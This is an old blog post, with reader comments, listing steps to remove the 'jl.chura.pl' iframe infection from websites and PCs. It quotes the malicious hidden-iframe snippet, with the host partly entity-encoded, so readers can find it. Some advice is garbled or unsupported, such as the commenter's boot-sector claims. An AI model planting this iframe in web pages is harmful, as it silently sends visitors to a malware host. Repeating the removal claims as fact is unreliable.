Iframe Virus jl.chura.pl Removal Todo List

I wrote a post about “Iframe Virus jl.chura.pl Removal“. Everyday, lots of users come to that post. I want write more about jl.chura.pl virus. I write a todo list.

jl.chura.pl Virus Remove todo list:

  1. Change all FTP passwords which is saved in your FTP program (ex. CuteFtp)
  2. Close your web sites if they are virused.
  3. Remove this code: “<iframe src=”http://jL.ch&#117;ra.pl/rc/” style=”display:none”></iframe>” with using Dreamweaver or any program which is access all pages in a directory.
  4. Dont forget this virus add this all pages (.php, .html, .asp) which have got </body> tag, virus add before this tag. Virus can add code to javascripts too.
  5. Download “Avast Home Edition“, free and infected this virus.
  6. Setup Avast Home Edition
  7. Restart your PC and open in safe mode
  8. Scan all of your computer.
  9. Upload clean pages to your web site
  10. Reopen your web site
  11. If google says your web site is have badwares, read;
    1. My site?s been hacked ? now what??
    2. Hey Google, I no longer have badware

PS: I am not guarenteed virus removal, this is my todo list. I did and now it is all cleaned.

Share and Enjoy:
  • StumbleUpon
  • Digg
  • TwitThis
  • FriendFeed
  • del.icio.us
  • MySpace
  • Technorati
  • Facebook
  • Google Bookmarks
  • Live

Enjoy this article?

Consider subscribing to our RSS feed!

Share us Facebook, FriendFeed, Digg

Liked by

This website uses IntenseDebate comments, but they are not currently loaded because either your browser doesn't support JavaScript, or they didn't load fast enough.

5 Comments

  1. abrar
    07:50 on July 31st, 2009

    i cant understand toooo long

  2. Dracconus
    02:43 on August 3rd, 2009

    # Change all FTP passwords in your ftp programs used to uplaod files – Do this on another system.
    # Close ALL internet, and local computer browsers.
    # Open EVERY PHP, HTML, HTM, and MHT , Javascript, and CSS file you have, and remove IFRAME code using an HTML editor (WYSIWYG style preferrably.)
    # Download ?Avast Home Edition?, free and infected this virus. (Bit Defender is my personal choice actually)
    # Setup Avast Home Edition (Or Bit Defender.)
    #Download SpyBot Search and Destroy (Update it COMPLETELY)
    #Download WinPatrol (regular version is fine, you’ll need this to make sure that it’s not back when you resume normal mode.)
    # Restart your PC; When it reboots, automatically spam the F8 Button to choose to boot into SafeMode. Choose SafeMode By itself, not one with networking, or command prompt.
    # Scan your ENTIRE computer. (If asked to delete, then delete. This is going to possibly eradicate some MUCH needed files, but trust me, going back, and getting these, or not deleting them now, this thing WILL come back.)
    #While in SafeMode – Make sure to DISABLE System Restore Service. The virus itself DOES store itself in the boot sectors of your operating system, and your system restore files as well.
    # Upload clean pages to your web site
    # Install SpyBot Search and Destroy, and WinPatrol.
    #Scan your system with Spybot
    #Open your internet browser of your choice, and MAKE SURE TO DELETE ALL HISTORY, SETTINGS, and other information including passwords.
    #Restart and boot into the regular mode of your computer.
    BEFORE YOU DO ANYTHING ELSE!!!!!
    DO THE FOLLOWING:
    Run Winpatrol, and browse the startup, delayed startup, processes, and services tabs. make ABSOLUTELY SURE that this is NO WHERE to be found.
    You’ll be looking for ANYTHING that has a TMP extension (E.G. Thisfile.TMP
    IF you DO find any file like this – Do the following steps:
    Right click on the file (if available in that menu) and click INFO
    Gather the location of the file.
    Start up your internet connection, and browse to
    http://majorgeeks.com/Unlocker_d4660.html
    Download and install this program. This program lets you delete files, or folders that are currently in use by your operating system (EG the virus.)
    Locate the virus TMP file after the installation of Unlocker and Right click on it.
    Select Unlocker in the Right Click Menu, and then in the popup window, select DELETE, and then hit UNLOCK.
    You MAY have to reboot the computer to effectively remove this file, if that’s the case, so be it, reboot, and AUTOMATICALLY go back into safemode. Delete the folder C:Documents and settingsYOURUSERNAMETEMP
    Also delete the C:Documents and settingsYOURUSERNAMEApplication DataTEMP folder
    One last deletion
    C:Documents and settingsYOURUSERNAMEMy DocumentTemporary Internet Files
    Now restart the computer ONE last time, and re-run in Normal Mode.
    All the problems SHOULD be gone (as well as possibly some of your files, but, sorry, that’s how it goes sometimes…

    **************A little more information*******************
    I have dealt with this virus for almost a month, studying it’s habits, and attempting MANY different removal methods with GREAT failure upon restoring the files.
    Although this virus only somewhat clings to your files, it’s the ability it has to be stored in TMP iles that makes it so “wonderous.” The virus can embed itself to ANY kind of document necessary. This is a TRUE leech on your system, and it’s best to follow these removal steps in the EXACT order that they’re given.

  3. webmastersucks
    08:26 on August 5th, 2009

    Thank you for explanation

  4. lisa
    20:25 on September 18th, 2009

    This link can be helpfull.
    http://kawablog.com/scarabox/product.php?id_produ...
    This script remove all malicious iframe from your server, for me that worked fine.

  5. astone9
    17:21 on January 18th, 2010

    Well i have also written an article on my blog. There is a script in PHP which automaticly scans and cleans you hosts and all index files infected with a iframe code. It is easy to use, if you would like you can inlcude it in you site. My post URL is
    http://hotfixes.edibra.com/webmasters/clean-ifram...

Sorry, the comment form is closed at this time.

Oyun